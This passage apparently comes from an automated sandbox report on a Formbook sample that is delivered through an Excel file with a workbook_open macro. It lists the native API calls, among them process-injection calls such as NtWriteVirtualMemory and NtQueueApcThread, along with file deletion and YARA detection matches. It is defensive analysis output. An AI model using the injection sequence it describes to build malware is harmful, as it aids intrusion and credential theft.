          Source: C:\Windows\Installer\MSID8B1.tmpMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wininit.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wininit.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F00C4 NtCreateFile,LdrInitializeThunk,7_2_008F00C4
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F0048 NtProtectVirtualMemory,LdrInitializeThunk,7_2_008F0048
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F0078 NtResumeThread,LdrInitializeThunk,7_2_008F0078
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EF9F0 NtClose,LdrInitializeThunk,7_2_008EF9F0
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EF900 NtReadFile,LdrInitializeThunk,7_2_008EF900
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_008EFAD0
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_008EFAE8
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_008EFBB8
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_008EFB68
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFC90 NtUnmapViewOfSection,LdrInitializeThunk,7_2_008EFC90
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFC60 NtMapViewOfSection,LdrInitializeThunk,7_2_008EFC60
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFD8C NtDelayExecution,LdrInitializeThunk,7_2_008EFD8C
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_008EFDC0
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFEA0 NtReadVirtualMemory,LdrInitializeThunk,7_2_008EFEA0
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_008EFED0
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFFB4 NtCreateSection,LdrInitializeThunk,7_2_008EFFB4
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F10D0 NtOpenProcessToken,7_2_008F10D0
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F0060 NtQuerySection,7_2_008F0060
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F01D4 NtSetValueKey,7_2_008F01D4
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F010C NtOpenDirectoryObject,7_2_008F010C
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F1148 NtOpenThread,7_2_008F1148
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F07AC NtCreateMutant,7_2_008F07AC
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EF8CC NtWaitForSingleObject,7_2_008EF8CC
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EF938 NtWriteFile,7_2_008EF938
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F1930 NtSetContextThread,7_2_008F1930
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFAB8 NtQueryValueKey,7_2_008EFAB8
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFA20 NtQueryInformationFile,7_2_008EFA20
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFA50 NtEnumerateValueKey,7_2_008EFA50
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFBE8 NtQueryVirtualMemory,7_2_008EFBE8
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFB50 NtCreateKey,7_2_008EFB50
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFC30 NtOpenProcess,7_2_008EFC30
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFC48 NtSetInformationFile,7_2_008EFC48
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F0C40 NtGetContextThread,7_2_008F0C40
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008F1D80 NtSuspendThread,7_2_008F1D80
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFD5C NtEnumerateKey,7_2_008EFD5C
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFE24 NtWriteVirtualMemory,7_2_008EFE24
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFFFC NtCreateProcessEx,7_2_008EFFFC
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008EFF34 NtQueueApcThread,7_2_008EFF34
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021F00C4 NtCreateFile,LdrInitializeThunk,9_2_021F00C4
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021F07AC NtCreateMutant,LdrInitializeThunk,9_2_021F07AC
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFAB8 NtQueryValueKey,LdrInitializeThunk,9_2_021EFAB8
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_021EFAD0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFAE8 NtQueryInformationProcess,LdrInitializeThunk,9_2_021EFAE8
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFB50 NtCreateKey,LdrInitializeThunk,9_2_021EFB50
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFB68 NtFreeVirtualMemory,LdrInitializeThunk,9_2_021EFB68
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFBB8 NtQueryInformationToken,LdrInitializeThunk,9_2_021EFBB8
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EF900 NtReadFile,LdrInitializeThunk,9_2_021EF900
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EF9F0 NtClose,LdrInitializeThunk,9_2_021EF9F0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_021EFED0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFFB4 NtCreateSection,LdrInitializeThunk,9_2_021EFFB4
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFC60 NtMapViewOfSection,LdrInitializeThunk,9_2_021EFC60
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFD8C NtDelayExecution,LdrInitializeThunk,9_2_021EFD8C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFDC0 NtQuerySystemInformation,LdrInitializeThunk,9_2_021EFDC0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021F0048 NtProtectVirtualMemory,9_2_021F0048
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021F0078 NtResumeThread,9_2_021F0078
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021F0060 NtQuerySection,9_2_021F0060
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021F10D0 NtOpenProcessToken,9_2_021F10D0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021F010C NtOpenDirectoryObject,9_2_021F010C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021F1148 NtOpenThread,9_2_021F1148
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021F01D4 NtSetValueKey,9_2_021F01D4
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFA20 NtQueryInformationFile,9_2_021EFA20
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFA50 NtEnumerateValueKey,9_2_021EFA50
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFBE8 NtQueryVirtualMemory,9_2_021EFBE8
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EF8CC NtWaitForSingleObject,9_2_021EF8CC
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EF938 NtWriteFile,9_2_021EF938
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021F1930 NtSetContextThread,9_2_021F1930
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFE24 NtWriteVirtualMemory,9_2_021EFE24
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFEA0 NtReadVirtualMemory,9_2_021EFEA0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFF34 NtQueueApcThread,9_2_021EFF34
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFFFC NtCreateProcessEx,9_2_021EFFFC
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFC30 NtOpenProcess,9_2_021EFC30
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFC48 NtSetInformationFile,9_2_021EFC48
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021F0C40 NtGetContextThread,9_2_021F0C40
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFC90 NtUnmapViewOfSection,9_2_021EFC90
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021EFD5C NtEnumerateKey,9_2_021EFD5C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021F1D80 NtSuspendThread,9_2_021F1D80
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00099D50 NtCreateFile,9_2_00099D50
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00099E00 NtReadFile,9_2_00099E00
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00099E80 NtClose,9_2_00099E80
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00099F30 NtAllocateVirtualMemory,9_2_00099F30
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00099DFB NtReadFile,9_2_00099DFB
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00099F2B NtAllocateVirtualMemory,9_2_00099F2B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024E93CE NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,9_2_024E93CE
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024E9862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,9_2_024E9862
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024E93D2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_024E93D2
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024E9DAE NtResumeThread,NtClose,9_2_024E9DAE
          Source: C:\Windows\SysWOW64\cmd.exeFile deleted: C:\Windows\Installer\MSID8B1.tmpJump to behavior
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008FE0C67_2_008FE0C6
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0092D0057_2_0092D005
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0091905A7_2_0091905A
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009030407_2_00903040
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008FE2E97_2_008FE2E9
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009A12387_2_009A1238
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008FF3CF7_2_008FF3CF
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009263DB7_2_009263DB
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009023057_2_00902305
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009073537_2_00907353
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0094A37B7_2_0094A37B
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009354857_2_00935485
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009114897_2_00911489
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0093D47D7_2_0093D47D
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0091C5F07_2_0091C5F0
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0090351F7_2_0090351F
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009046807_2_00904680
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0090E6C17_2_0090E6C1
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009A26227_2_009A2622
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0098579A7_2_0098579A
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0090C7BC7_2_0090C7BC
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009357C37_2_009357C3
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0099F8EE7_2_0099F8EE
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0090C85C7_2_0090C85C
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0092286D7_2_0092286D
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009A098E7_2_009A098E
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009029B27_2_009029B2
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009169FE7_2_009169FE
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009859557_2_00985955
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009B3A837_2_009B3A83
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_009ACBA47_2_009ACBA4
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0098DBDA7_2_0098DBDA
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_008FFBD77_2_008FFBD7
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_00927B007_2_00927B00
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0099FDDD7_2_0099FDDD
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_00930D3B7_2_00930D3B
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0090CD5B7_2_0090CD5B
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_00932E2F7_2_00932E2F
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0091EE4C7_2_0091EE4C
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_00910F3F7_2_00910F3F
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: 7_2_0092DF7C7_2_0092DF7C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022A12389_2_022A1238
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021FE2E99_2_021FE2E9
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022023059_2_02202305
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0224A37B9_2_0224A37B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022073539_2_02207353
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022A63BF9_2_022A63BF
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021FF3CF9_2_021FF3CF
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022263DB9_2_022263DB
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0222D0059_2_0222D005
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022030409_2_02203040
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0221905A9_2_0221905A
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021FE0C69_2_021FE0C6
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022A26229_2_022A2622
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0224A6349_2_0224A634
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022046809_2_02204680
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0220E6C19_2_0220E6C1
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0220C7BC9_2_0220C7BC
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0228579A9_2_0228579A
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022357C39_2_022357C3
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0223D47D9_2_0223D47D
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022354859_2_02235485
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022114899_2_02211489
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0220351F9_2_0220351F
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022465409_2_02246540
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0221C5F09_2_0221C5F0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022B3A839_2_022B3A83
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_02227B009_2_02227B00
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022ACBA49_2_022ACBA4
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_021FFBD79_2_021FFBD7
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0228DBDA9_2_0228DBDA
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0222286D9_2_0222286D
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0220C85C9_2_0220C85C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0229F8EE9_2_0229F8EE
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022859559_2_02285955
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022029B29_2_022029B2
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022A098E9_2_022A098E
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_022169FE9_2_022169FE
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_02232E2F9_2_02232E2F
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0221EE4C9_2_0221EE4C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_02210F3F9_2_02210F3F
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0222DF7C9_2_0222DF7C
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_02230D3B9_2_02230D3B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0220CD5B9_2_0220CD5B
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0229FDDD9_2_0229FDDD
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0009E0719_2_0009E071
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_0009E5FC9_2_0009E5FC
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00082D879_2_00082D87
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00082D909_2_00082D90
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00089E309_2_00089E30
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_00082FB09_2_00082FB0
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024E98629_2_024E9862
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024E10699_2_024E1069
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024E10729_2_024E1072
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024E81329_2_024E8132
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024EDA6F9_2_024EDA6F
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024EAA329_2_024EAA32
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024EDB0E9_2_024EDB0E
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024E5B1F9_2_024E5B1F
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024E5B229_2_024E5B22
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024E2CEC9_2_024E2CEC
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 9_2_024E2CF29_2_024E2CF2
          Source: 0d69e4f6_by_Libranalysis.xlsOLE, VBA macro line: Private Sub workbook_open()
          Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function workbook_openName: workbook_open
          Source: 0d69e4f6_by_Libranalysis.xlsOLE indicator, VBA macros: true
          Source: C:\Windows\SysWOW64\wininit.exeCode function: String function: 0226F970 appears 81 times
          Source: C:\Windows\SysWOW64\wininit.exeCode function: String function: 021FDF5C appears 118 times
          Source: C:\Windows\SysWOW64\wininit.exeCode function: String function: 021FE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\wininit.exeCode function: String function: 0224373B appears 238 times
          Source: C:\Windows\SysWOW64\wininit.exeCode function: String function: 02243F92 appears 108 times
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: String function: 008FE2A8 appears 38 times
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: String function: 0096F970 appears 81 times
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: String function: 008FDF5C appears 110 times
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: String function: 0094373B appears 238 times
          Source: C:\Windows\Installer\MSID8B1.tmpCode function: String function: 00943F92 appears 108 times
          Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
